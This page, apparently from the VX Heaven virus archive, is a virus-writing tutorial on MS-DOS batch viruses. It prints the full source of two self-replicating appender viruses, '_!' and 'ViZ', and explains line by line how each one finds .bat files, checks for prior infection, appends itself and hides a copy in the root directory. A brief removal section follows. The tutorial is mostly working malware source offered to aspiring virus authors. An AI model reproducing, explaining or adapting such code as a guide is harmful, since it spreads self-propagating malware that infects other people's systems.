Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Batch Virii

Knowdeth

[Back to index] [Comments]

Utils you will need:

About batch virii

Batch is a language created and used in MS-DOS. They are created by simple text editors, ie Edit.com or Notepad.exe. Most batch virii use very simple means of copying and spreding. They will just append their code at the end of other *.bat in the hopes they will be ran. Like many HLL's you can use very "Structured programming" in the form of subs and loops with if lines for all error handling, much like Qbasic.

Advanced batch virii can also rename a binary then copy itself to a batch with the same name. They may use machine code to drop or hide payloads such as *.com files thru debugger, and may also use ansi bombs as a destructive payload. Makeing the the "trojan" able to reproduce itself. I do -NOT- agree at all with destructive payloads in virii, and you will not see them in this paper!

The Code ("_!" by Wavefunc):

@ctty nul._!
for %%a in (*.bat ..\*.bat) do set _!=%%a
find "_!"<%_!%
if errorlevel 1 find "_!"<%0.BAT>>%_!%
ctty con._!

This is a very simple batch virus appender

@
when this in position 1 in front of the command, @ prevents the command from being echoed to the console, even if echo is on.
ctty
changes terminal device used by the computer
nul
sends the output of the file to nowhere
%%a
scan for batches and for each one found call program in the variable then the name of the batch to check (%%a).
find
check to see if the virus is present in target
if errorlevel 1
branch "if" there, get the next filename
>>
appends the output to the end of a file

Now for somthing more advanced.

ViZ by -KD-

:: [ViZ] by -KD- of Metaphase
@echo off%_ViZ%
if '%1=='ViZ goto ViZ%2
if exist c:\_ViZ.bat goto ViZstart
if not exist %0.bat goto ViZexit
find "ViZ"<%0.bat>c:\_ViZ.bat
attrib c:\_ViZ.bat +h
:ViZstart
if '%!ViZ%=='- goto ViZexit
set !ViZ=%!ViZ%-
command /e:5000 /c c:\_ViZ ViZ v
:DaViZ
goto ViZexit
:ViZv
for %%a in (*.bat) do call c:\_ViZ ViZ inf %%a 
exit ViZ
:ViZ_inf
find "ViZ"<%3>nul
if not errorlevel 1 goto ViZlevel
type c:\_ViZ.bat>>%3
exit ViZ
:ViZlevel
set ViZ!=%ViZ!%-
if %ViZ!%==- exit 
:ViZexit

This is a appender that makes one run per session. It looks for and infects one batch per run in the current dir only.

::
a REM line
@
when this in position 1 in front of the command, @ prevents the command from being echoed to the console, even if echo is on.
if 1%
branches if 1st parm
if exist
branches if file is there
if not exist
branches if not there
find
check to see if the virus is present in target
attrib
hide our virus
set
set the variables
command
do the command
for a%%
look for variables in batch
nul
sends the output of the file to nowhere
type
appends the file
exit
anything can be after the "exit", but its nice to name the exit :-)
ViZexit
your all done

Removal of batch virii

Batch virii work by adding code to the beginning and/or the end of the infected .bat files. All infected code can be removed by loading the infected .bat in to a text editor and removing the added lines. Some may use a hidden copy of themselves in root and/or other dir's.

The command DIR /AH /S shows ALL hidden files on a drive. You will then need to use attrib *.bat -s -r -h then use del *.bat, with "*.bat" as the virus name.

This my FIRST attempt at a tutorial. If you like it or have and comments I can be reached at #virus on undernet. This is also in a way here to help wordbasic/VBA writers. Because to be good at macros you must be good at batch. P.S. HLL is not dead!

(C)Knowdeth

You may distribute this paper freely, without any changes or modifications. It cannot be used for any comercial purpose without my permission. The use of this code is ONLY for research and learning purposes and may NOT be used to cause harm to any computer system.

By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua